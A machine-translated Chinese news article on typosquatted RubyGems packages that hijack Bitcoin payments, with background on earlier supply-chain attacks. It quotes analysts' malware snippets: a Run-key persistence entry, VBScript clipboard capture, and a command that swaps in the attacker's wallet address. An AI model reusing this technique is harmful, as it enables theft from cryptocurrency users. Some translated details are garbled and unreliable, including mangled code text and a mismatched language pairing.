最近发现有超过725个被下载了数千次的恶意软件包在泛滥RubyGems是发布Ruby编程语言的程序和代码库的官方渠道。
安全公司ReversingLabs的联合创始人和首席软件架构师Tomislav Pericin告诉Ars,恶意包被下载了近10万次,尽管其中很大一部分可能是脚本自动抓取存储库中所有15.8万个包的结果。所有这些信息都来自两个用户账号:“金·凯瑞”和“彼得·吉本斯”。
ReversingLabs怀疑这些账户可能是某个人所为,他们使用了一种拼写错误的变体——给恶意文件或域名取一个与常见名称相似的名称——给人一种它们是合法的印象。例如,“atlas_client”是一个有2100次下载的陷阱包,它是真正的“atlas_client”包的替代品。从2月16日到2月25日,超过700个包裹被上传。
安装后,这些包会执行一个脚本,试图拦截在Windows设备上进行的比特币支付。逆转实验室的威胁分析师托米斯拉夫·马吉奇说,在一篇帖子中写道:
脚本本身相当简单。首先,它创建了一个新的VBScript Sle,主恶意循环在“%PROGRAMDATA%\Microsoft Essentials\Software Essentials”。根据“路径。作为它的持久机制,它然后创建一个新的自动运行注册表项“HCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Software Essentials”。这样,恶意软件确保每次系统启动或重新启动时都运行它。
当“软件要领”。Vbs”恶意脚本被执行,它开始了一个无限循环,在那里它捕获用户的剪贴板数据与以下代码行:
设置objHTML = CreateObject("htmlfile")
文本= objHTML.ParentWindow.ClipboardData.GetData(“文本”)然后,脚本检查剪贴板数据是否与加密货币钱包地址的格式匹配。如果是这样,它将在隐藏窗口中使用攻击者控制的地址“1JkU5XdNLji4Ugbb8agEWL1ko5US42nNmc”替换该地址,使用以下命令:
WScript。Shell运行“C:\Windows\System32\cmd.exe / C echo 1JkU5XdNLji4Ugbb8agEWL1ko5US42nNmc | clip”,0通过这种方式,威胁行为者试图将所有潜在的加密货币交易重定向到他们的钱包地址。在写这篇博客的时候,这个钱包似乎没有交易。
RubyGems的维护人员没有回复寻求置评的电子邮件。
最近的几个
这绝不是人们第一次使用拼写错误将恶意包潜入广泛使用的开源存储库。2016年,一名大学生将草稿脚本上传到RubyGems、PyPi和NPM,这三个网站分别为Python、Ruby和JavaScript编程语言的开发人员提供社区网站。该学生脚本中的电话回家功能显示冒名顶替者代码是在超过17000个独立的域上执行了超过45000次超过一半的时间里,他的代码被授予了全能的管理权限。其中两个受影响的域名以。mil结尾,这表明美国军方内部人员运行了他的脚本。攻击者很快就采用了这种技术。2018年,一名袭击者把一个劫持剪贴板的人偷偷带进了PyPi.恶意软件包的标题是“Colorama”,看起来类似于Colorama,后者是Python存储库中下载次数最多的20个合法模块之一。该恶意软件包被下载了171次,这还不包括从镜像站点下载的内容。
一个月后,攻击者成功实现了更令人印象深刻的壮举,他们偷偷潜入了一个盗取比特币的后门进入事件流这是一个从NPM存储库下载了200万次的代码库。一款名为CoPay的货币钱包的开发人员将恶意库整合到更新中,并警告称,任何受污染版本信任的私钥都应被视为已被泄露。
这名大学生2016年的实验,以及合法事件流库的陷阱,证明了针对开源存储库的供应链攻击是在敏感机器上执行恶意代码的有效方式。今年的RubyGems活动表明,这些供应链攻击不会很快消失。
“对于软件开发人员来说,几乎没有什么保护措施可以确保他们从这些存储库中安装的软件包是无恶意软件的,”ReversingLabs的联合创始人伯里金说。“目前,恶意软件作者正在利用这个市场上的巨大缺口。”
你必须登录或创建帐户置评。